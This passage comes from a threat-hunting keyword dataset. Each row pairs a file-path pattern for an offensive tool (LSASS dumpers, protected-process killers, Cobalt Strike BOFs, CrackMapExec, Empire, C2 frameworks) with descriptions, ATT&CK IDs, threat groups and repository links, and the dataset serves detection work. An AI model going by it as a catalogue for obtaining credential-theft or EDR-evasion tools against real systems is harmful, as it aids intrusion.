T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*/PowerView.ps1*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,1,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*/PowerView3.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*/PPEnum/*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*/ppl/ppl.c*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*/ppl_dump.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*/PPLBlade.git*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,1,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*/ppldump.*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*/PPLDump_BOF/*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*/PPLFault/*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary 
code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*/PPLKiller.git*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*/PPLKiller/*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*/pptp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/prepare.sh shell/mod_*.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*/PrimusC2*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*/PrimusC2.git*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z 
-*/printerbug.py*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,1,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -*/PrintMonitorDll.*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*/PrintMonitorDll/*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*/PrintSpoofer.git*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*/PrintSpoofer.git*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*/PrintSpoofer/*,offensive_tool_keyword,cobaltstrike,Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 
- T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crisprss/PrintSpoofer,1,1,N/A,10,10,76,8,2021-10-07T17:45:00Z,2021-10-07T17:28:45Z -*/Priv_Esc.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/privesc/*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/PrivescCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*/PrivExchange*,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*/PrivExchange.git*,offensive_tool_keyword,privexchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1053.005 - T1078 - T1069.002,TA0002 - TA0003 - TA0004,N/A,N/A,Privilege 
Escalation,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*/PrivFu.git*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*/PrivilegeEscalation/*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/Privileger.git*,offensive_tool_keyword,Privileger,Privileger is a tool to work with Windows Privileges,T1548.002,TA0004 ,N/A,N/A,Privilege 
Escalation,https://github.com/MzHmO/Privileger,1,1,N/A,8,2,117,25,2023-02-07T07:28:40Z,2023-01-31T11:24:37Z -*/PrivKit.git*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,1,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*/PrivKit/*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,1,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*/proberbyte.go*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*/process_herpaderping/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/process_killer.cpp*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*/processhacker-*-bin.zip*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? 
can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*/processhacker/files/latest/download*,greyware_tool_keyword,processhacker,Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injection,T1055.001 - T1055.012 - T1003.001 - T1056.005,TA0005 - TA0040 - TA0006 - TA0009,N/A,N/A,Credential Access - Persistence - Defense Evasion,https://processhacker.sourceforge.io/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*/Process-Instrumentation-Syscall-Hook*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/ProduKey.exe*,offensive_tool_keyword,produkey,ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.,T1003.001 - T1003.002 - T1012 - T1057 - T1518,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/product_cd_key_viewer.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/prometheus.exe,offensive_tool_keyword,prometheus,malware C2,T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment,1,1,N/A,10,10,176,63,2020-07-21T06:14:44Z,2018-09-04T15:38:53Z -*/protocols/ftp.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/ldap.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/mssql.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/rdp.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/rdp.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/smb.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/protocols/ssh.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - 